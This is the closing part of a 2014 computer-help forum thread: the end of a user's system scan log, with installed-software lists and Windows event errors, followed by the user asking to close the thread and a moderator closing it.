"PunkBusterSvc" = PunkBuster Services
"pywin32-py2.6" = Python 2.6 pywin32-212
"S-603818780" = SO.Booster
"SearchProtect" = Search Protect
"SecondLifeViewer" = SecondLifeViewer (remove only)
"Settings Alerter" = Settings Alerter
"Sims2Pack Clean Installer " = Sims2Pack Clean Installer 
"SoftwareUpdUtility" = Download Updater (AOL LLC)
"Steam App 102700" = Alliance of Valiant Arms
"Steam App 17020" = Global Agenda
"Steam App 203290" = America's Army: Proving Grounds Beta
"Steam App 208090" = Loadout
"Steam App 209870" = Blacklight: Retribution
"Steam App 212370" = Arctic Combat
"Steam App 239660" = Soldier Front 2
"Steam App 243870" = Tom Clancy's Ghost Recon Phantoms - NA
"Steam App 440" = Team Fortress 2
"Steam App 51100" = Tactical Intervention
"Steam App 644" = Portal 2 Publishing Tool
"Sublime Text 2_is1" = Sublime Text 2.0.2
"Tiny Media Player_is1" = Tiny Media Player v1.0
"Unigine Heaven Benchmark (Basic Edition)_is1" = Heaven Benchmark version 4.0
"Uninstall Helper 2.0.1.0" = Uninstall Helper
"Uninstall_is1" = Uninstall 1.0.0.1
"USB Safely Remove_is1" = USB Safely Remove 4.0
"VLC media player" = VLC media player 1.1.7
"WildTangent hp Master Uninstall" = HP Games
"Winamp" = Winamp
"WinLiveSuite" = Windows Live Essentials
"Wise Disk Cleaner_is1" = Wise Disk Cleaner 5.33
"Wise Registry Cleaner_is1" = Wise Registry Cleaner Free 5.35
"xampp" = XAMPP
"XfireCodec" = Xfire Codec (remove only)
"Xvid Video Codec 1.3.2" = Xvid Video Codec
 
========== HKEY_CURRENT_USER Uninstall List ==========
 
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{2922D6F1-2865-4EFA-97A9-94EEAB3AFA14}" = ROBLOX Studio 2013 for Owner
"{4B35F00C-E63D-40DC-9839-DF15A33EAC46}" = Grand Theft Auto Vice City
"AdminScriptEditor" = AdminScriptEditor
"AIM" = AIM for Windows
"Akamai" = Akamai NetSession Interface
"Dropbox" = Dropbox
"FileZilla Client" = FileZilla Client 3.5.0
"Game Organizer" = EasyBits GO
"GameMaker81" = GameMaker 8.1
"I-Doser v4" = I-Doser v4
"JoinMe" = join.me
"Power Loader" = Power Challenge Game Plugin
"Smilebox" = Smilebox
"Spotify" = Spotify
"TeamSpeak 3 Client" = TeamSpeak 3 Client
"uTorrent" = µTorrent
"Winamp Detect" = Winamp Detector Plug-in
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 5/30/2014 10:55:02 | Computer Name = Owner-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
 
Error - 5/30/2014 10:55:02 | Computer Name = Owner-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 3011
 
Error - 5/30/2014 10:55:02 | Computer Name = Owner-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 3011
 
Error - 5/30/2014 10:55:03 | Computer Name = Owner-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
 
Error - 5/30/2014 10:55:03 | Computer Name = Owner-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 4010
 
Error - 5/30/2014 10:55:03 | Computer Name = Owner-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 4010
 
Error - 5/30/2014 11:03:22 | Computer Name = Owner-PC | Source = WinMgmt | ID = 10
Description = 
 
Error - 5/30/2014 11:29:26 | Computer Name = Owner-PC | Source = WinMgmt | ID = 10
Description = 
 
Error - 5/30/2014 11:42:38 | Computer Name = Owner-PC | Source = Microsoft-Windows-LoadPerf | ID = 3001
Description = The performance counter name string value in the registry is not formatted
 correctly. The malformed string is iewFetch. The first DWORD in the Data section
 contains the index value to the malformed string while the second and third DWORDs
 in the Data section contain the last valid index values.
 
Error - 5/30/2014 11:52:33 | Computer Name = Owner-PC | Source = WinMgmt | ID = 10
Description = 
 
Error - 5/30/2014 12:02:22 | Computer Name = Owner-PC | Source = Application Error | ID = 1000
Description = Faulting application name: Explorer.EXE, version: 6.1.7601.17567, 
time stamp: 0x4d672ee4  Faulting module name: msvcrt.dll, version: 7.0.7601.17744,
 time stamp: 0x4eeb033f  Exception code: 0x40000015  Fault offset: 0x000000000002a84e
Faulting
 process id: 0x290  Faulting application start time: 0x01cf7c1fd3e15119  Faulting application
 path: C:\Windows\Explorer.EXE  Faulting module path: C:\Windows\system32\msvcrt.dll
Report
 Id: c8476aa4-e813-11e3-bb6f-dd68fd12b4f3
 
[ System Events ]
Error - 5/30/2014 12:02:36 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7001
Description = The Network List Service service depends on the Network Location Awareness
 service which failed to start because of the following error:   %%1068
 
Error - 5/30/2014 12:02:36 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7001
Description = The Network List Service service depends on the Network Location Awareness
 service which failed to start because of the following error:   %%1068
 
Error - 5/30/2014 12:02:36 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7001
Description = The Network List Service service depends on the Network Location Awareness
 service which failed to start because of the following error:   %%1068
 
Error - 5/30/2014 12:02:36 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7001
Description = The Network List Service service depends on the Network Location Awareness
 service which failed to start because of the following error:   %%1068
 
Error - 5/30/2014 12:02:36 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7001
Description = The Network List Service service depends on the Network Location Awareness
 service which failed to start because of the following error:   %%1068
 
Error - 5/30/2014 12:02:36 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7001
Description = The Network List Service service depends on the Network Location Awareness
 service which failed to start because of the following error:   %%1068
 
Error - 5/30/2014 12:02:36 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7001
Description = The Network List Service service depends on the Network Location Awareness
 service which failed to start because of the following error:   %%1068
 
Error - 5/30/2014 12:04:00 | Computer Name = Owner-PC | Source = DCOM | ID = 10005
Description = 
 
Error - 5/30/2014 12:08:07 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7001
Description = The Network List Service service depends on the Network Location Awareness
 service which failed to start because of the following error:   %%1068
 
Error - 5/30/2014 12:11:13 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7001
Description = The Network List Service service depends on the Network Location Awareness
 service which failed to start because of the following error:   %%1068
 
 
< End of report >
 


#3 NikJ92

NikJ92

    Authentic Member

  • Authentic Member
  • PipPip
  • 69 posts

Posted 09 June 2014 - 05:40 AM

Close this. Using MBAM forum.



#4 Juliet

Juliet

    SuperHelper

  • Classroom Teacher
  • 7,097 posts
  • Interests:Boo!....
  • MVP

Posted 11 June 2014 - 05:05 AM

Since this issue appears to be resolved ... this Topic has been closed. Glad we could be of assistance.

If you're the topic starter, and need this topic reopened, please contact a staff member with the address of the thread.

Everyone else please follow the instructions here http://forums.whatth...ed_t106388.html
and start a New Topic.
Sometimes the angels fly close enough to you that you can hear the flutter of their wings...

Want to help others? Join the ClassRoom and learn how.
MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??

Related Topics



0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users